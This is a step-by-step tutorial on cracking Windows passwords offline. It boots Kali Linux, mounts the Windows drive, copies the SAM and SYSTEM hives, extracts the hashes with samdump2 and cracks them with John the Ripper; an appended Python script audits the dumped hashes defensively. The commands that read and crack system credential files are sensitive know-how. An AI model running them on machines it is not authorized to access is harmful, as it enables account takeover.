CRACKING WINDOWS PASSWORDS USING JOHN THE RIPPER


JOHN THE RIPPER:-

John the Ripper is a password cracking tool that tries to detect weak passwords. It can run against a wide variety of password and hash types. The tool is also helpful for password recovery, in case you forget your password.

John the Ripper is popular because of its dictionary attacks and is mainly used in brute-force attacks. An ethical hacking researcher at iicybersecurity said this method is useful because many old firms still use old Windows versions, which is not good in terms of cybersecurity.

CRACKING WINDOWS:-

In Windows, passwords are typically stored in the SAM file in %SystemRoot%\system32\config. Windows uses the NTLM hash. During boot, the hashes in the SAM file are decrypted using the SYSKEY and loaded into the registry, where they are then used for authentication.

Windows does not allow users to copy the SAM file to another location, so you have to boot another OS, mount the Windows partition from it and copy the SAM file. Once the file is copied, we will decrypt the SAM file with the SYSKEY and get the hashes for breaking the password.

In the case below we are using Kali Linux to mount the Windows partition.

  • To make the bootable disk you can use the Rufus freeware, which is available here: https://rufus.ie/en_IE.html
  • This freeware is very easy to use. You simply have to select the Kali Linux ISO image to make the bootable disk.
  • After creating the boot disk, simply boot from it and follow the steps mentioned below.
  • First you have to check which hard disk partition Windows is installed on. For that, type fdisk -l.

CHECKING THE HARD DISK PARTITIONS:-

  • In the above screenshot, after executing the command, it has shown 3 partitions of the target hard disk. By looking at the partition sizes you can tell where the target OS (Windows) is installed.

MOUNT:-

  • Type mkdir /mnt/CDrive to create the directory.
  • To mount the hard disk partition /dev/sda2 on the CDrive directory, type mount /dev/sda2 /mnt/CDrive
  • Then, to check the mount point, type ls -ltr /mnt/CDrive
  • Type mount to check the mounted drive:
    root@kali:~/temp# mount
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
    proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
    udev on /dev type devtmpfs (rw,nosuid,relatime,size=2042548k,nr_inodes=201161,mode=755)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
    tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=412292k,mode=755)
    /dev/sdb1 on /run/live/medium type vfat (ro,noatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro)
    /dev/loop0 on /run/live/rootfs/filesystem.squashfs type squashfs (ro,noatime)
    tmpfs on /run/live/overlay type tmpfs (rw,noatime,size=2061444k,mode=755)
    overlay on / type overlay (rw,noatime,lowerdir=/run/live/rootfs/filesystem.squashfs/,upperdir=/run/live/overlay/rw,workdir=/run/live/overlay/work)
    tmpfs on /usr/lib/live/mount type tmpfs (rw,nosuid,noexec,relatime,size=412292k,mode=755)
    /dev/sdb1 on /usr/lib/live/mount/medium type vfat (ro,noatime,fmask=0022,dmask=0022,codepage=437,iocharset=ascii,shortname=mixed,utf8,errors=remount-ro)
    /dev/loop0 on /usr/lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
    tmpfs on /usr/lib/live/mount/overlay type tmpfs (rw,noatime,size=2061444k,mode=755)
    securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
    tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
    tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
    cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
    cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
    pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
    bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)
    cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
    cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
    cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
    cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
    cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
    cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
    cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
    cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
    cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
    systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=34,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=16732)
    hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
    mqueue on /dev/mqueue type mqueue (rw,relatime)
    debugfs on /sys/kernel/debug type debugfs (rw,relatime)
    tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
    tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=412288k,mode=700)
    gvfsd-fuse on /run/user/0/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=0,group_id=0)
    fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
    /dev/sda2 on /mnt/CDrive type fuseblk (rw,relatime,user_id=0,group_id=0,allow_other,blksize=4096)

 
  • In the above output, the last line shows that the target hard disk partition has been mounted on the CDrive directory.

COPYING THE SAM FILE:-

  • Type mkdir /tmp/temp
  • Type cp /mnt/CDrive/Windows/System32/config/SAM /tmp/temp

SAM FILE:-

  • Samdump2 fetches the SYSKEY and extracts the hashes from the Windows SAM file.
  • To install samdump2, type sudo apt-get update and then type sudo apt-get install samdump2.

COPYING THE SYSTEM FILE:-

  • Now copy the SYSTEM hive, which holds the SYSKEY: type cp /mnt/CDrive/Windows/System32/config/SYSTEM /tmp/temp
  • Type samdump2 SYSTEM SAM

  • In the above screenshot, after executing samdump2, it shows the hashes from the SAM file. In the next red-marked area there are 4 users on the target system.
  • Now type samdump2 SYSTEM SAM > hash.txt to redirect the hash output to a file named hash.txt.

CRACKING THE PASSWORD USING JOHN THE RIPPER:-

  • Type john --format=LM --wordlist=/root/usr/share/john/password_john.txt hash.txt

  • In the above screenshot, after executing the above command, the wordlist is used to crack the password. As shown above, the current password for the target OS is 123456.
  • An attacker can also use his own wordlist for cracking the password. In Kali Linux many wordlists are available that can be used for cracking. To use the Kali Linux wordlists, go to /usr/share/wordlists/

NOTE:- The above method works up to the Windows 7 operating system. It will not work on Windows 8/8.1/10.
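A defender-side complement to the samdump2 and john steps above, added here as an example and not part of the original article: hash.txt is in pwdump format (user:RID:LM hash:NT hash:::), so the same file can be audited before anyone runs a wordlist against it. Because NT hashes are unsalted, two accounts with the same hash share a password; a non-empty LM field means the legacy LM hash the --format=LM attack targets is still being stored; the NT hash of the empty string means a blank password. The sample lines are constructed and the non-empty hash values are placeholders, not hashes of real accounts.

```python
"""Audit pwdump-style output (user:rid:LM:NT:::) as emitted by samdump2."""
from collections import defaultdict

# Well-known constants: LM field when LM storage is disabled, and the NT hash
# of the empty string (i.e. a blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the format of `samdump2 SYSTEM SAM > hash.txt`.
# Non-empty hashes are placeholders, not real password hashes.
SAMPLE_HASH_TXT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:11111111111111112222222222222222:0123456789abcdef0123456789abcdef:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""


def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples, skipping blank or malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue
        rows.append((parts[0], parts[1], parts[2].lower(), parts[3].lower()))
    return rows


def audit(rows):
    """Map account name -> list of findings for accounts that have any."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)  # unsalted NT hash -> accounts using it
    for user, _rid, lm, nt in rows:
        if lm != EMPTY_LM:
            findings[user].append("LM hash stored (target of john --format=LM)")
        if nt == EMPTY_NT:
            findings[user].append("blank password")
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings[u].append("password shared with " + others)
    return dict(findings)


if __name__ == "__main__":
    for account, issues in audit(parse_pwdump(SAMPLE_HASH_TXT)).items():
        print(account, "->", "; ".join(issues))
```

On a real hash.txt the same audit runs with `audit(parse_pwdump(open("hash.txt").read()))`; accounts without findings are simply absent from the result.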
